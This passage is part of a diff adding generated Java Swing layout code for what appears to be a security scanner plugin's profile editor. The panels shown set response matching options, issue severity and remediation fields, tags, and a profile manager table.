+ .addComponent(textcl, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, 100, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel16, javax.swing.GroupLayout.PREFERRED_SIZE, 62, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel42, javax.swing.GroupLayout.PREFERRED_SIZE, 62, javax.swing.GroupLayout.PREFERRED_SIZE)))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addGap(20, 20, 20)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel6)
+ .addComponent(jLabel2))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(rb1)
+ .addComponent(rb2)
+ .addComponent(rb3)
+ .addComponent(rb4)
+ .addComponent(sp1, javax.swing.GroupLayout.PREFERRED_SIZE, 56, javax.swing.GroupLayout.PREFERRED_SIZE)))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel31)
+ .addComponent(jLabel30, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(onlyhttp)
+ .addComponent(check4)
+ .addComponent(check1)
+ .addComponent(excludehttp)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(check72)
+ .addComponent(check71))
+ .addGap(15, 15, 15)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(text71, javax.swing.GroupLayout.DEFAULT_SIZE, 347, Short.MAX_VALUE)
+ .addComponent(text72))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(negativeCT, javax.swing.GroupLayout.Alignment.TRAILING)
+ .addComponent(negativeRC, javax.swing.GroupLayout.Alignment.TRAILING)))
+ .addComponent(jLabel29)
+ .addComponent(jLabel28, javax.swing.GroupLayout.PREFERRED_SIZE, 769, javax.swing.GroupLayout.PREFERRED_SIZE))))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+
+ jPanel11Layout.linkSize(javax.swing.SwingConstants.HORIZONTAL, new java.awt.Component[] {jScrollPane2, textfield2, textgreps});
+
+ jPanel11Layout.setVerticalGroup(
+ jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addContainerGap()
+ .addComponent(jLabel27)
+ .addGap(12, 12, 12)
+ .addComponent(jLabel26)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addComponent(radio4)
+ .addGap(18, 18, 18)
+ .addComponent(radio3)
+ .addGap(18, 18, 18)
+ .addComponent(radio12))
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(radiotime)
+ .addComponent(texttime, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel16))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(radiocl)
+ .addComponent(jLabel42)
+ .addComponent(textcl, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(radio22)))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(variationsRadio)
+ .addComponent(invariationsRadio))
+ .addGap(18, 18, 18)
+ .addComponent(Attributes, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(jSeparator12)
+ .addComponent(jSeparator11))
+ .addGap(18, 18, 18)
+ .addComponent(jLabel25)
+ .addGap(12, 12, 12)
+ .addComponent(jLabel24)
+ .addGap(32, 32, 32)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(textgreps, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button8))
+ .addGap(26, 26, 26)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addGroup(jPanel11Layout.createSequentialGroup()
+ .addComponent(button7)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button9)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(button10))
+ .addComponent(jScrollPane2, javax.swing.GroupLayout.PREFERRED_SIZE, 111, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(textfield2, javax.swing.GroupLayout.Alignment.TRAILING, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(button11))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator6, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel31)
+ .addGap(12, 12, 12)
+ .addComponent(jLabel30)
+ .addGap(18, 18, 18)
+ .addComponent(check4)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(check1)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(excludehttp)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(onlyhttp)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(check71)
+ .addComponent(text71, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(negativeCT))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(check72)
+ .addComponent(text72, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(negativeRC))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator5, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel29)
+ .addGap(12, 12, 12)
+ .addComponent(jLabel28)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(rb1)
+ .addComponent(jLabel6))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(rb2)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(rb3)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(rb4)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addGroup(jPanel11Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(jLabel2)
+ .addComponent(sp1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+
+ jPanel11Layout.linkSize(javax.swing.SwingConstants.VERTICAL, new java.awt.Component[] {textcl, texttime});
+
+ headerstab.addTab(" Response ", jPanel11);
+ jPanel11.getAccessibleContext().setAccessibleName("");
+
+ jPanel12.setAutoscrolls(true);
+
+ jLabel32.setText("You can define the issue properties.");
+
+ jLabel33.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel33.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel33.setText("Issue Properties");
+
+ jLabel3.setText("Issue Name:");
+
+ jLabel4.setText("Severity:");
+
+ buttonGroup2.add(radio5);
+ radio5.setText("High");
+
+ buttonGroup2.add(radio6);
+ radio6.setText("Medium");
+
+ buttonGroup2.add(radio7);
+ radio7.setText("Low");
+
+ buttonGroup2.add(radio8);
+ radio8.setText("Information");
+
+ jLabel7.setText("Confidence:");
+
+ buttonGroup5.add(radio9);
+ radio9.setText("Certain");
+
+ buttonGroup5.add(radio10);
+ radio10.setText("Firm");
+
+ buttonGroup5.add(radio11);
+ radio11.setText("Tentative");
+
+ jLabel34.setText("You can define the issue details.");
+
+ jLabel35.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel35.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel35.setText("Issue Detail");
+
+ textarea2.setColumns(20);
+ textarea2.setRows(5);
+ jScrollPane7.setViewportView(textarea2);
+
+ jLabel13.setText("Description:");
+
+ jLabel36.setText("You can define the issue background.");
+
+ jLabel37.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel37.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel37.setText("Issue Background");
+
+ jLabel38.setText("You can define the remediation detail.");
+
+ jLabel39.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel39.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel39.setText("Remediation Detail");
+
+ textarea1.setColumns(20);
+ textarea1.setRows(5);
+ jScrollPane1.setViewportView(textarea1);
+
+ jLabel9.setText("Description:");
+
+ textarea3.setColumns(20);
+ textarea3.setRows(5);
+ jScrollPane8.setViewportView(textarea3);
+
+ jLabel14.setText("Description:");
+
+ jLabel40.setText("You can define the remediation background.");
+
+ jLabel41.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel41.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel41.setText("Remediation Background");
+
+ textarea4.setColumns(20);
+ textarea4.setRows(5);
+ jScrollPane9.setViewportView(textarea4);
+
+ jLabel15.setText("Description:");
+
+ javax.swing.GroupLayout jPanel12Layout = new javax.swing.GroupLayout(jPanel12);
+ jPanel12.setLayout(jPanel12Layout);
+ jPanel12Layout.setHorizontalGroup(
+ jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jSeparator7)
+ .addGap(6, 6, 6))
+ .addComponent(jSeparator10)
+ .addComponent(jLabel41)
+ .addComponent(jLabel40)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jSeparator8, javax.swing.GroupLayout.DEFAULT_SIZE, 944, Short.MAX_VALUE)
+ .addComponent(jSeparator9)
+ .addComponent(jLabel33)
+ .addComponent(jLabel35)
+ .addComponent(jLabel34)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jLabel13)
+ .addGap(18, 18, 18)
+ .addComponent(jScrollPane7, javax.swing.GroupLayout.PREFERRED_SIZE, 612, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jLabel9)
+ .addGap(18, 18, 18)
+ .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 612, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jLabel15)
+ .addGap(18, 18, 18)
+ .addComponent(jScrollPane9, javax.swing.GroupLayout.PREFERRED_SIZE, 612, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jLabel14)
+ .addGap(18, 18, 18)
+ .addComponent(jScrollPane8, javax.swing.GroupLayout.PREFERRED_SIZE, 612, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addComponent(jLabel37)
+ .addComponent(jLabel36)
+ .addComponent(jLabel39)
+ .addComponent(jLabel38)
+ .addComponent(jLabel32)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jLabel3)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(jLabel4, javax.swing.GroupLayout.PREFERRED_SIZE, 73, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addComponent(radio8)
+ .addGap(189, 189, 189))
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(radio6)
+ .addComponent(radio7)
+ .addComponent(radio5))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(jLabel7)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(radio9)
+ .addComponent(radio11)
+ .addComponent(radio10)))))
+ .addComponent(text4, javax.swing.GroupLayout.PREFERRED_SIZE, 419, javax.swing.GroupLayout.PREFERRED_SIZE))))))
+ .addContainerGap())
+ );
+ jPanel12Layout.setVerticalGroup(
+ jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addGap(19, 19, 19)
+ .addComponent(jLabel33)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel32)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(jLabel3)
+ .addComponent(text4, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(jLabel7)
+ .addComponent(radio9))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(radio10)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(radio11))
+ .addGroup(jPanel12Layout.createSequentialGroup()
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(jLabel4)
+ .addComponent(radio5))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(radio6)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(radio7)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(radio8)))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator7, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel35)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel34)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel9)
+ .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator8, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel37)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel36)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel13)
+ .addComponent(jScrollPane7, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator9, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel39)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel38)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel15)
+ .addComponent(jScrollPane9, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGap(18, 18, 18)
+ .addComponent(jSeparator10, javax.swing.GroupLayout.PREFERRED_SIZE, 10, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(18, 18, 18)
+ .addComponent(jLabel41)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel40)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel12Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel14)
+ .addComponent(jScrollPane8, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+
+ headerstab.addTab(" Issue ", jPanel12);
+
+ removetag.setText("Remove");
+ removetag.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ removetag(evt);
+ }
+ });
+
+ addTag.setText("Add");
+ addTag.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ addTag(evt);
+ }
+ });
+
+ listtag.setModel(tag);
+ jScrollPane11.setViewportView(listtag);
+
+ jLabel46.setText("You can define one or multiple tags for this profile.");
+
+ jLabel47.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel47.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel47.setText("Set Tags");
+
+ newTagb.setText("New Tag");
+ newTagb.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ newTag(evt);
+ }
+ });
+
+ javax.swing.GroupLayout jPanel3Layout = new javax.swing.GroupLayout(jPanel3);
+ jPanel3.setLayout(jPanel3Layout);
+ jPanel3Layout.setHorizontalGroup(
+ jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel3Layout.createSequentialGroup()
+ .addContainerGap()
+ .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jLabel47)
+ .addComponent(jLabel46)
+ .addGroup(jPanel3Layout.createSequentialGroup()
+ .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(newTagb, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
+ .addComponent(addTag, javax.swing.GroupLayout.PREFERRED_SIZE, 93, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(removetag, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING, false)
+ .addComponent(jScrollPane11)
+ .addComponent(newTagCombo, javax.swing.GroupLayout.PREFERRED_SIZE, 468, javax.swing.GroupLayout.PREFERRED_SIZE))))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+
+ jPanel3Layout.linkSize(javax.swing.SwingConstants.HORIZONTAL, new java.awt.Component[] {addTag, newTagb, removetag});
+
+ jPanel3Layout.setVerticalGroup(
+ jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel3Layout.createSequentialGroup()
+ .addGap(19, 19, 19)
+ .addComponent(jLabel47)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(jLabel46)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(jScrollPane11, javax.swing.GroupLayout.PREFERRED_SIZE, 99, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGroup(jPanel3Layout.createSequentialGroup()
+ .addComponent(newTagb)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(removetag)))
+ .addGap(18, 18, 18)
+ .addGroup(jPanel3Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(newTagCombo, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(addTag))
+ .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE))
+ );
+
+ headerstab.addTab(" Tags ", jPanel3);
+
+ javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
+ jPanel1.setLayout(jPanel1Layout);
+ jPanel1Layout.setHorizontalGroup(
+ jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel1Layout.createSequentialGroup()
+ .addGap(19, 19, 19)
+ .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel1Layout.createSequentialGroup()
+ .addComponent(jLabel1)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(combo1, javax.swing.GroupLayout.PREFERRED_SIZE, 590, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(jButton2)
+ .addGap(18, 18, 18)
+ .addComponent(jButton3, javax.swing.GroupLayout.PREFERRED_SIZE, 101, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addGroup(jPanel1Layout.createSequentialGroup()
+ .addComponent(jLabel12)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED)
+ .addComponent(text1, javax.swing.GroupLayout.PREFERRED_SIZE, 265, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(38, 38, 38)
+ .addComponent(jLabel18)
+ .addGap(18, 18, 18)
+ .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, 211, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addGap(35, 35, 35)
+ .addComponent(jLabel8)
+ .addGap(18, 18, 18)
+ .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addComponent(radio1)
+ .addComponent(radio2)
+ .addComponent(radioPR))))
+ .addContainerGap(36, Short.MAX_VALUE))
+ .addGroup(jPanel1Layout.createSequentialGroup()
+ .addComponent(headerstab, javax.swing.GroupLayout.PREFERRED_SIZE, 0, Short.MAX_VALUE)
+ .addContainerGap())
+ );
+
+ jPanel1Layout.linkSize(javax.swing.SwingConstants.HORIZONTAL, new java.awt.Component[] {jButton2, jButton3});
+
+ jPanel1Layout.setVerticalGroup(
+ jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
+ .addGroup(jPanel1Layout.createSequentialGroup()
+ .addGap(19, 19, 19)
+ .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(combo1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel1)
+ .addComponent(jButton2)
+ .addComponent(jButton3))
+ .addGap(22, 22, 22)
+ .addComponent(radio1)
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
+ .addComponent(radio2)
+ .addComponent(text1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)
+ .addComponent(jLabel12)
+ .addComponent(jLabel8)
+ .addComponent(jLabel18)
+ .addComponent(textauthor, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE))
+ .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
+ .addComponent(radioPR)
+ .addGap(18, 18, 18)
+ .addComponent(headerstab, javax.swing.GroupLayout.PREFERRED_SIZE, 1405, Short.MAX_VALUE))
+ );
+
+ jTabbedPane2.addTab(" Profiles Definition ", jPanel1);
+
+ jLabel43.setFont(new java.awt.Font("Lucida Grande", 1, 14)); // NOI18N
+ jLabel43.setForeground(new java.awt.Color(255, 102, 51));
+ jLabel43.setText("Profile Manager");
+
+ jLabel44.setText("In this section you can manage the profiles. ");
+
+ jLabel45.setText("Filter by Tag");
+
+ newTagCombo2.addItemListener(new java.awt.event.ItemListener() {
+ public void itemStateChanged(java.awt.event.ItemEvent evt) {
+ selectTag(evt);
+ }
+ });
+ newTagCombo2.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
+ newTagCombo2ActionPerformed(evt);
+ }
+ });
+
+ jtabpane.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+
+ table.setAutoCreateRowSorter(true);
+ table.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ table.setModel(model);
+ table.setRowSorter(null);
+ table.getTableHeader().setReorderingAllowed(false);
+ jScrollPane5.setViewportView(table);
+
+ jtabpane.addTab("Active Profiles", jScrollPane5);
+
+ table1.setAutoCreateRowSorter(true);
+ table1.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ table1.setModel(model1);
+ table1.setRowSorter(null);
+ table1.getTableHeader().setReorderingAllowed(false);
+ jScrollPane6.setViewportView(table1);
+
+ jtabpane.addTab("Passive Response Profiles", jScrollPane6);
+
+ table2.setAutoCreateRowSorter(true);
+ table2.setFont(new java.awt.Font("Lucida Grande", 0, 14)); // NOI18N
+ table2.setModel(model2);
+ table2.setRowSorter(null);
+ table2.getTableHeader().setReorderingAllowed(false);
+ jScrollPane10.setViewportView(table2);
+
+ jtabpane.addTab("Passive Request Profiles", jScrollPane10);
+
+ button1.setText("Enable");
+ button1.addActionListener(new java.awt.event.ActionListener() {
+ public void actionPerformed(java.awt.event.ActionEvent evt) {
